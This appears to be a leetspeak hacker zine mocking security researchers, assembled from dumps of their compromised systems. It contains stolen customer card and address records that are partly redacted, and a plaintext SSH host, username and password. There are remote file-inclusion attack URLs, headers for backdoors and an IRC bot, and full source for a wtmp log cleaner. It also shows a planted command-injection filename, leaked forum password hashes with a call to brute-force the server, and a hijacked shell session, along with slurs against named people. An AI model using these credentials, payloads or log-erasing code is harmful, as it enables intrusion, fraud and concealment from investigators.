nobody:x:99:99:nobody:/:
sshd:x:33:33:sshd:/:
konewka:x:1000:100:***********,,,:/home/konewka:/bin/bash
free:x:1005:100:FTP,,,:/home/free:/bin/false
konewka@olek:~$ cd b0x
konewka@olek:~/b0x$ ls
mcux.txt gwee-1.36 m0d.txt matrix.txt mod.pl ns/ tar.tar.gz
konewka@olek:~/b0x$ cat cux.txt
First Name Jim
Last Name [edited]
Address [edited]
City [edited]
State NC
Post Code [edited]
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card James [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=10.1499999761581

First Name Dana
Last Name [edited]
Address [edited]
City [edited]
State OR
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Next Day Air
Weight=8
Ship to Name [edited]
Ship to Address [edited]
Ship City [edited]
Ship State IN
Ship Post Code [edited]
Ship Country US

Customer Information
First Name Marlene
Last Name [edited]
Address [edited]
City [edited]
State TN
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card Marlene [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=25
Ship to Name Marlene [edited]
Ship to Address [edited]
Ship City [edited]
Ship State TN
Ship Post Code [edited]
Ship Country US

Customer Information
First Name Michael
Last Name [edited]
Address [edited]
City [edited]
State TX
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card Michael [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=15.2000000476837

Customer Information
First Name Paula
Last Name [edited]
Address [edited]
City [edited]
State ME
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card Paula [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=8
konewka@olek:~/b0x$ cat m0d.txt
217.115.176.3
port - 22
proto - ssh
user - bes
pass - gbpltw

**************
konewka@olek:~/b0x$ head -n2 matrix.txt
http://vvmu.isot.ru/index.php?page=http://zerkalodeface.narod.ru/universal.php
http://ezonet.ru/index.php?page=http://zerkalodeface.narod.ru/universal
konewka@olek:~/b0x$ cd ../w0rkz
konewka@olek:~/w0rkz$ ls
eric-client.c evil.php kenny-smart.c mybindshell.c sesje.bash*
eric.c kenny* log_clean.c priv8kenny.c tvn.c
konewka@olek:~/w0rkz$ head -n6 eric.c
/*
** eric.c - Fri May 12 2004
** Linux backdoor with terminal support.
** Compile with -lutil flag.
** konewka/roSEC
*/

konewka@olek:~/w0rkz$ head -n5 eric-client.c
/*
** eric-client.c - Fri May 12 2004
** Simple client which connects to your eric backdoor
** konewka/roSEC
*/

konewka@olek:~/w0rkz$ head -n15 kenny-smart.c
/*
** kenny.c by konewka <konewka@eviltime.com>
**
** Simple IRC bot, that can execute shell commands and print it out
** to you. With this bot you may execute shell commands with full anonymity,
** it's kind of connect back backdoor.
**
** It has been tested on IRCnet and EFnet IRC networks, and should
** compile without any problems on Linux and FreeBSD.
**
** If you want only one certain host to execute commands compile with
** -DMASTERONLY flag and change MASTER define.
**
** Fell free to add your functions, but keep my nickname in credits.
*/

konewka@olek:~/w0rkz$ cat log_clean.c
#include <stdio.h>
#include <utmp.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char *argv[]) {
struct utmp ut;
char user[] = "konewka", host[] = "konewka";
int f_in, f_out, ut_len;

if ((f_in = open("/var/log/wtmp", O_RDONLY)) < 0) {
printf("cant open\n");
return -1;
}

if ((f_out = open("wtmp", O_WRONLY|O_CREAT)) < 0) {
printf("cant open to write\n");
return -1;
}

ut_len = sizeof(ut);
while (read(f_in, &ut, ut_len) == ut_len) {
if (!strncmp(ut.ut_user, user, strlen(user)) || !strncmp(ut.ut_host, host, strlen(host)))
;
else
write(f_out, &ut, ut_len);
}

close(f_out);
close(f_in);
return 0;
}
konewka@olek:~/w0rkz$ head -n5 mybindshell.c
/* mybindshell.c coded by konewka (www.olek.org)
* backdoor (bindshell) with password.
* cleaned up code.
* enjoy !
*/

konewka@olek:~/w0rkz$ head -n39 priv8kenny.c
/*
** priv8kenny.c by konewka <konewka@eviltime.com>
**
** Simple IRC bot, that can execute shell commands and print it out
** to you. With this bot you may execute shell commands with full anonymity,
** it's kind of connect back backdoor.
**
** It has been tested on IRCnet and EFnet IRC networks, and should
** compile without any problems on Linux and FreeBSD.
**
** Fell free to add your functions, but keep my nickname in credits.
**
** Few words about the usage, the best way is to take a look into source.
** Anyway, when bot successfuly joined our channel, you can:
** - Exec commands by !sh <command>
** - Join/part channels by !part/!join <#channel_name>
** - Op/Deop users by !op/deop <user1> [user2] [user3]
** - Select random nick and then voice or kick him by !random voice/kick
** - To quit use !exit
**
** Changes:
** - Added next "war" option - mass deop (!mdeop)
** - Added mass kick - !mkick or !mkick noops to kick only users without op
** - Added simple userlist and kick protection on users (change users array)
** - Added timer in port_scan() and service display
** - Added ping reply while connecting on some irc servers (irc.0x333.org)
** - Added ctcp version reply
** - Added reconnect()
** - Added mass deop protection, on d4rkgr3y request :)
** - Added !scan - use !scan <nickname> or <hostname>
** - Added !script and !run that allow you to program your bot, e.g.
** !script mode #ch +i;privmsg #ch :haha :) and !run to execute instructions
** - Added !say - syntax should look like this !say <nick/#chan> :message text
** - Added !where to locate bot
** - Fixed bot.nick overwrite
** - Added !op and terrific random kick/voice - !random kick/voice.
** - Fixed process hide (port).
** - Fixed Since now errors from execution wont be printed to terminal.
*/

konewka@olek:~/w0rkz$ head -n8 tvn.c
/* copyright (c) konewka
* moje malenstwo do sprawdzania rozkladu jazdy na stacji TVN (uwielbiam wasza telewizje)
* polecam uzywac razem z jakims edytorem strumieniowym, sed, awk (..)
* PRZEGLADAC Z MORE'em ! :)
*
* Pozdrawiam Tomasza Lisa.
*
*/

konewka@olek:~/w0rkz$


wh4t a h4q3r! th1z k1d w4st3z m0r3 t1m3 c0d1ng p01ntl3zz to0lz th4n synapze 0n
th3 w33k3ndz h3 h4z c0k3.


02.txt -~-~-~ ri0t c0d3z

ri0t m1lw0rmz m0r3 3xpl01tz th4n a h4q3d ES ftpd. h3z n0t g01ng t0 qu1t s3cur1ty
c4uz3 h3'z g41n1ng m0r3 f4m3 th4n ph0bos & cold-fire fr0m t3chtv r3runz! 3xp0s3d
1n r3sp3ct4bl3 full d1zcl0sur3 f4zz10n.

y0ur c0de suqz. y0ur s1t3 suqz. y0u sm3ll 0f sh33p f3c3z. 3y3 th1nk y0u n33d t0
t4k3 4n 0nl1n3 w3b d3s1gn c0urz3 0r s0m3th1ng. fuqn d0rk.

j4q:/Users/anybody/fuzz j4q$ echo '' > '`ls>abc`'
j4q:/Users/anybody/fuzz j4q$ chmod 7777 '`ls>abc`'
j4q:/Users/anybody/fuzz j4q$ su anybody
Password:
anybody:~/fuzz anybody$ wget http://www.ri0tnet.net/fuzzyri0t.tar.gz
anybody:~/fuzz anybody$ tar -zxvf fuzzyri0t.tar.gz
fuzzyri0t.pl
anybody:~/fuzz anybody$ ls -al
total 24
drwxrwxrwx 4 anybody 14790 136 Jul 24 04:09 .
drwxrwxrwx 56 anybody 14790 1904 Jul 24 04:07 ..
-rwsrwsrwt 1 j4q 14791 1 Jul 24 04:07 `ls>abc`
-rw-r--r-- 1 anybody 14790 6618 Jul 24 04:08 fuzzyri0t.pl
anybody:~/fuzz anybody$ perl fuzzyri0t.pl

What task would you like to perform?

[0] Input target program manualy.
[1] Select target program from a list of all suid programs.
[2] Display all world writeable files on the system.
[3] Display all world writeable directories on the system.
[4] Exit.

Please input choice: 1

Finding all suid programs on the system this will only occur once please wait.....
[0] /bin/df
[1] /bin/ps
[2] /bin/rcp
[3] /dev/fd/3/`ls>abc`
[4] /sbin/launchd
[5] /sbin/mount_nfs
[6] /sbin/mount_smbfs
[7] /sbin/ping
[8] /sbin/ping6
[9] /sbin/restore
[10] /sbin/route
[11] /sbin/rrestore
[12] /sbin/umount
[13] /Users/anybody/fuzz/`ls>abc`
[14] /usr/bin/at
[15] /usr/bin/atos
[16] /usr/bin/atq
[17] /usr/bin/atrm
[18] /usr/bin/batch
[19] /usr/bin/chfn
[20] /usr/bin/chpass
[21] /usr/bin/chsh
[22] /usr/bin/crontab
[23] /usr/bin/edit
[24] /usr/bin/fetchmail
[25] /usr/bin/heap
[26] /usr/bin/leaks
[27] /usr/bin/lockfile
[28] /usr/bin/login
[29] /usr/bin/lppasswd
[30] /usr/bin/malloc_history
[31] /usr/bin/nfsstat
[32] /usr/bin/passwd
[33] /usr/bin/procmail
[34] /usr/bin/quota
[35] /usr/bin/rlogin
[36] /usr/bin/rsh
[37] /usr/bin/sample
[38] /usr/bin/setregion
[39] /usr/bin/smbutil
[40] /usr/bin/su
[41] /usr/bin/sudo
[42] /usr/bin/top
[43] /usr/bin/vmmap
[44] /usr/bin/wall
[45] /usr/bin/write
[46] /usr/sbin/lsof
[47] /usr/sbin/netstat
[48] /usr/sbin/postdrop
[49] /usr/sbin/postqueue
[50] /usr/sbin/pppd
[51] /usr/sbin/screenreaderd
[52] /usr/sbin/scselect
[53] /usr/sbin/traceroute
[54] /usr/sbin/traceroute6
[55] /usr/sbin/trpt
[56] /usr/sbin/vpnd

Please select desired target: 13

running program with no options to get usage settings.

sh: line 1: /Users/anybody/fuzz/: is a directory

Please input any optional switches you would like to use with the target program:

Please select attack payload

[0] Standard Buffer Overflow
[1] Standard Format String
[2] Custom Attack Payload
[3] Main Menu

Please input choice: 3

What task would you like to perform?

[0] Input target program manualy.
[1] Select target program from a list of all suid programs.
[2] Display all world writeable files on the system.
[3] Display all world writeable directories on the system.
[4] Exit.

Please input choice: 4
anybody:~/fuzz anybody$ ls -al
total 32
drwxrwxrwx 5 anybody 14790 170 Jul 24 04:11 .
drwxrwxrwx 56 anybody 14790 1904 Jul 24 04:07 ..
-rwsrwsrwt 1 j4q 14791 1 Jul 24 04:07 `ls>abc`
-rw-r--r-- 1 anybody 14790 26 Jul 24 04:11 abc
-rw-r--r-- 1 anybody 14790 6619 Jul 24 04:11 fuzzyri0t.pl
anybody:~/fuzz anybody$


th4nkz t0 0ur 0d4y 0SX p0rt 0f f1l3fuzz w3 w3r3 4bl3 t0 sp0t th1z s3cur1ty h0l3
(bd) b3f0r3 ri0t c0uld uz3 1t 4g41nst uz!@ f33l fr33 t0 us3 1t & m4k3 ri0t rm
h1ms3lf. w3 w1ll tr4d3 4n 3xpl01t 4g41nztfuzzyri0t f0r a r3m0t3 psybnc 0r r3m0t3
cvs 0d4y. 3m41l dvdman@l33tsecurity.com t0 w0rk 0ut d3t41lz (s3nd pic@#$!).


03.txt -~-~-~ sabre-security

az yu0 all kn0w, sabre-secur1ty releazes some el1te auditing t00lz. h4LvaR fl4ke
iz a g3niuz but h3 k4nt s33m to sekure h1z shit w3ll... s0 w3 had t0 0wn hiz
f0rumz!! i mean sh1t, wr1ting all th3ze sec t00lz iz r34lly h4rd 0r s0meth1ng &
secur1ng a f0rum muzt be ev3n hard3r!

http://www.sabre-security.com/forum/simpleforum_files/forum_01/forum.info
<forum_name>SABRE BinDiff</forum_name>
<forum_more>Discussions of SABRE BinDiff, binary diffing and IDB migration in general</forum_more>
<forum_pass>SiawRaNQeVgkI</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/forum/simpleforum_files/forum_02/forum.info
<forum_name>SABRE BinNavi</forum_name>
<forum_more>Discussions of SABRE BinNavi, graph-based debugging and input crafting</forum_more>
<forum_pass>SifafLvA6kS8o</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/forum/simpleforum_files/forum_03/forum.info
<forum_name>SABRE BinAudit</forum_name>
<forum_more>Discussions of SABRE BinAudit, automated static analysis of executables, dataflow analysis</forum_more>
<forum_pass>SiJQ4YtHtAqFE</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/forum/simpleforum_files/forum_04/forum.info
<forum_name>General RE</forum_name>
<forum_more>General discussion of matter related to binary analysis</forum_more>
<forum_pass>Si/QbwJMRBLNs</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/forum/simpleforum_files/simpleforum.conf


wh0a d00dz, s1nce wh3n are sekur1ty pr0fessi0nalz
supp0z3d t0 leav3 their syst3mz open th1z wide?@


admin_password:SiD7JOBQAe6Y2
images_dir:simpleforum_files/images

h3y skew, if yu0'r3 read1ng th1z sh1t, n0w iz th3
tim3 t0 sshbrute th3 fuq outta the s3rv3r.
0h and mak3 sur3 y0u craq th3ze. w3 are n0t
capabl3 0f such elite taskz. h4r h4r h4r!@!($@#

title:SABRE Security User Forum
home_name:Home
home_url:http://www.sabre-security.com/content.html
hour_difference:0
hoursystem:12
date_notation:ddmmyy
html_protection:on
bbcode:on
smileys:on
author_edit:on
backgroundcolor:#FFFFFF
backgroundimage:simpleforum_files/images/background.gif
tablecolor1:#E9E6E6
tablecolor2:#D8D7D7
tablecolor3:#F8F7F7
tablebordercolor:#555555
tablewidth:93%
postformbackground:#E9E6E6
fontface:verdana,arial
fontsize:9
fontsizesmall:8
fontcolor:#555555
topics_per_page:10
posts_per_page:20
popularnumb:15
link_color:#E27153
visited_link_color:#E27153
link_hover_color:#CC6666
language:English
mail:off
admin_email:
mailprog:/usr/sbin/sendmail
admin_email_notify:off
show_email_addresses:off
attachments_dir:simpleforum_files/attachments
attachments_url:simpleforum_files/attachments
allow_attachments:yes
attachments_uploadmax:1024000


m4ybe y0u fuck3rz sh0uld BinNavi y0ur 0wn CGI, h4 h4r h4r!!

w3've alw33z want3d t0 be devel0perz f0r sabre BinNavi,
and eye th1nk luQ sh1ned d0wn up0n uz:

<post>
<name>halvar.flake</name>
<ip>***.**.***.**</ip>
<email>halvar.flake@sabre-security.com</email>
<subject>Welcome ...</subject>
<time>1101219538</time>
<message>... if you can read this, you're a developer for SABRE BinNavi :-)
</message>
</post>

<post>
<name>SË.ren Meyer-Eppler</name>
<ip>**.***.***.***</ip>
<email>soeren.meyer-eppler@BuschnicK.net</email>
<subject>Re: Welcome ...</subject>
<time>1101233402</time>
<message>that I am I guess ;-)
</message>
</post>

halvar, y0u muzt 4dd 'h0no' to ur lizt 0f develop3rz,
y0u w1ll appreciat3 0ur c0ntributi0n t0 y0ur sekur1ty f1rm!

<post>
<name>Halvar Flake</name>
<ip>**.***.***.**</ip>
<email>halvar.flake@sabre-security.com</email>
<subject>SABRE BinNavi beta testers</subject>
<time>1113951197</time>
<message>Hey all,

we're looking for 1-2 adventurous customers that would like
to try out the beta version of SABRE BinNavi for a bit. Any
volunteers ? :)

Cheers,
Halvar

-~-~-~
h0no 4lr34dy h4z B1nN4v1 b3t4. full 0f fmtstr1ng bugz.
-~-~-~

</message>
</post>

<post>
<name>Dennis</name>
<ip>**.***.***.***</ip>
<email></email>
<subject>Re: SABRE BinNavi beta testers</subject>
<time>1113978612</time>
<message>Sure, I'd definately be interested!
Should I contact you by email ? ;-)

-~-~-~
y3z, h0p3fully a f3ll0w #darknet m3mb3r h4z 1t sn1ff3d.
-~-~-~

</message>
</post>

<post>
<name>Halvar Flake</name>
<ip>**.***.***.**</ip>
<email>halvar.flake@sabre-security.com</email>
<subject>Re: SABRE BinNavi beta testers</subject>
<time>1114010506</time>
<message>Yes please :-)
</message>
</post>

<post>
<name>Dennis</name>
<ip>**.***.***.***</ip>
<email></email>
<subject>Re: SABRE BinNavi beta testers</subject>
<time>1114172955</time>
<message>Thanks for the beta, HalVar!

I really like this product and I'll definately purchase
a BinNavi license! I'm looking forward to it!

-~-~-~
st0p kiss1ng ass, Dennis! w3 n33d this m0re than y0u!@$
ps. Dennis, it'z 4 tr0j4n.
-~-~-~

</message>
</post>

<post>
<name>halvar.flake</name>
<ip>***.**.***.**</ip>
<email>halvar.flake@sabre-security.com</email>
<subject>If you can read this ...</subject>
<time>1101219695</time>
<message>... I gave you a password

-~-~-~
th4nkz a l0t f0r th1z go0dz!@#
-~-~-~

</message>
</post>

0mg, halvar, w3 are y0ur b3st fanz. eye th1nk w3 des3rve a BinNavi license!
p3rhapz y0u c0uld h00k uz up w1th s0me mad BinNavi w4r3z??!

k33p up the gr8 w0rk, sabre-secur1ty. y0u are 0ur id0lz. btw, az a fri3ndly h0no
suggezti0n (w3 are fri3ndz r1ght?), m4ybe y0u sh0uld B1nN4v1 y0ur 0wn k0d3Z?
s0rry f0r br1nging thiz extr3m3ly m1nd-numb1ng c0nc3pt up, but wh4tz up w1th
th1z sh1T?!$@

c0ngr4tz g0 0ut t0 SË.ren Meyer-Eppler f0r m4k1ng 1t az a n3w BinNav1
dEvElop3r!@$$ m4y y0u kiss a l0t 0f k4lvar ass. (w3 ar3 fuqn j3al0us)

--

h0no n0ticed th4t sabre-security haz n0 sl0gan. if y0u are g0ing int0 the
bizn3zz w0rld, y0u've g0tta have 0ne!!@

az a g3stur3 0f k1ndnezz, w3 h4v3 th0ught 0f 0ne f0r y0u! y0u will uz3 it!!

"SABRE Security - W3 f0rg0t t0 uZe BinAud1t 0n 0urSeLv3z!"

truzt us. 1t w1ll w0rk l1k3 nutz.

--

f0r aLL y0u BinNavi l0v3rz, h0no haz put t0g3ther a sp3cial k0nt3zt f0r y0u.

HOW TO WIN A COPY OF BINNAVI 0DAY W4R3Z!

- s3nd an e-m41L t0 Halvar expla1ning h0w much 0f a f4gg0t h3 1z. wh03ver s3ndz
th3 b3zt e-m4iL t0 h1m g3tz a PHR33 C0PY 0F BINNAVI W1TH A SP3CIAL HALVAR FLAKE
AUTOGR4PH.

th3 c0nt3zt h4z 4lr34dy 3nd3d. dvdm4n w0n.


04.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 1

l0r14n sur3 1z c0nf1d3nt th4t th3 b0x3z h3 sshz fr0m r s3cur3. t43m d34d3nd-php,
s3cur3!@$@#

(root@c0mp) (/owned/bitchez/) # ssh cf.sourceforge.net -lsesser
sesser@cf.sourceforge.net's password:
Pdmenu
+-------------Choose compile farm server...--------------+
¶ Exit ¶
¶ Z. CompileFarm ShellServer (CentOS 4.2, x86) ¶
¶ ¶
¶ Complete instructions on using the Compile Farm ¶
¶ are available at: http://sf.net/docs/E02/ ¶
¶ ¶
¶ Compile Farm status information available at ¶
¶ http://sf.net/docs/A05/ ¶
¶ ¶
¶ A. [x86] Linux 2.4 (Debian 2.2) ¶
¶ B. [x86] Linux 2.6 (Fedora FC2) ¶
¶ ¶
¶ C. [x86] FreeBSD (4.8) ¶
¶ D. [x86] NetBSD (1.6.1) ¶
¶ ¶
¶ E. [AMD64] Linux 2.6 (Fedora Core 3 on AMD64 Opteron) ¶
¶ F. [AMD64] Linux 2.6 (Fedora Core 3 on AMD64 Opteron) ¶
¶ ¶
¶ G. [Alpha] Linux 2.2 (Debian 3.0) ¶
¶ ¶
+--------------------------------------------------------+
Welcome to Pdmenu 1.2.85 by Joey Hess <joey@kitenet.net>

Last login: Sun Dec 18 12:43:48 2005 from login.cf.sourceforge.net
Welcome to the SourceForge CompileFarm Shellserver.

This host provides a centralized point of access for receiving e-mail
generated by other compile farm hosts (i.e. cron job results). From the
Compile Farm Shell Server, mail may be forwarded to, or be generated to,
SourceForge.net user accounts (username@users.sourceforge.net) and
SourceForge.net project mailing lists
(projectname-listname@lists.sourceforge.net).

Cron jobs may also be scheduled on the Compile Farm shell server, as to
perform automated clean-up of build directories, etc.

As of 2004-01-14, you may now SSH (and SCP, SFTP, rsync over SSH) directly
to this Compile Farm shell server. Information may be found in the
Compile Farm guide (URL below). This host may connect to other Compile
Farm hosts using 'ssh' to the hostnames in: /etc/compilefarm-hosts

A NEW AND IMPROVED guide to the Compile Farm is now available
(updated 2004-10-12) at: https://sourceforge.net/docs/E02/

-bash-3.00$ ls -al
total 1660
drwxr-xr-x 7 sesser users 4096 Dec 11 13:58 .
drwxr-xr-x 42 root root 4096 Nov 29 06:20 ..
-rw------- 1 sesser users 19384 Nov 30 04:41 .bash_history
drwx------ 2 sesser users 4096 Dec 5 2004 .cedit
-rw------- 1 sesser users 131584 Dec 9 2004 core
-rw-r--r-- 1 sesser users 503393 Oct 25 07:24 hardening-patch-4.4.0-0.4.3.patch
-rw------- 1 sesser users 19384 Dec 3 11:09 homebas
-rw------- 1 sesser users 19384 Dec 3 11:09 homebase
-rwxr-xr-x 1 sesser users 800464 Nov 30 04:37 libc.so.1
drwxr-xr-x 3 sesser users 4096 Dec 6 2004 .mc
-rwxr-xr-x 1 sesser users 4683 Dec 13 2004 p
-rw-r--r-- 1 sesser users 204 Dec 13 2004 p.c
drwxr-xr-x 17 sesser users 4096 Oct 28 01:59 php-4.4.0
-rw-r--r-- 1 sesser users 664 Dec 9 2004 sparc.o
-rw-r--r-- 1 sesser users 72 Dec 9 2004 sparc.s
drwxr-xr-x 2 sesser users 4096 Oct 31 23:33 .ssh
-rwxr-xr-x 1 sesser users 9032 Dec 9 2004 t
-rw-r--r-- 1 sesser users 99 Dec 9 2004 t.c
-rw-r--r-- 1 sesser users 725 Dec 6 2004 test.o
-rw-r--r-- 1 sesser users 228 Dec 6 2004 test.s
-rwxr-xr-x 1 sesser users 9324 Nov 27 09:37 tmp
-rwxr-xr-x 1 sesser users 6748 Nov 30 04:34 tmp2
-rwxr-xr-x 1 sesser users 6624 Nov 30 04:36 tmp3
-rw-r--r-- 1 sesser users 278 Nov 30 04:34 tmp.c
-rw------- 1 sesser users 6736 Nov 27 09:36 .viminfo
drwx------ 2 sesser users 4096 Jun 15 2004 .w3m
-rwxr-xr-x 1 sesser users 13411 Dec 5 2004 x
-rwxr-xr-x 1 sesser users 8975 Dec 5 2004 x_alpha
-rw-r--r-- 1 sesser users 1003 Dec 5 2004 x.c
-rwxr-xr-x 1 sesser users 9544 Dec 5 2004 x_ppc
-rw-r--r-- 1 sesser users 1033 Dec 13 2004 xpx
-rwxr-xr-x 1 sesser users 6548 Dec 5 2004 x_sparc
-rwxr-xr-x 1 sesser users 8976 Dec 5 2004 x_sparcv9
-bash-3.00$ cat .bash_history
make
mc
exit
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\157\144\165\154\145\163'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164\057\143\164\171\160\145'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
./config.nice
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
vi test.s
gcc -c test.s
objdump --disassemble test.o
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\151\156\143\154\165\144\145'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
vi test.php
gdb php
gdb pgp
gdb php
gdb ./php
gdb pgp
gdb ./php
php test.php
./php test.php
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
./php test.php
gdb ./php
./php test.php
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
